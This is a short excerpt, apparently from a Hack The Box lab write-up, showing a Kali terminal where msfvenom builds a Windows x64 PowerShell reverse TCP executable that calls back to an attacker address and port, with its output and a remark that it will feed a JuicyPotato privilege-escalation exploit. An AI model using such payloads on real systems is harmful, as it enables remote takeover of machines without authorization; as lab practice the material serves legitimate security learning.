MSFVenom


┌──(kali㉿kali)-[~/archive/htb/labs/bastard]
└─$ msfvenom -p windows/x64/powershell_reverse_tcp LHOST=10.10.14.6 LPORT=1234 -f exe -o pe.exe
[-] no platform was selected, choosing msf::Module::Platform::Windows from the payload
[-] no arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
payload size: 1885 bytes
final size of exe file: 8192 bytes
saved as: pe.exe

This payload will be used for the JuicyPotato exploit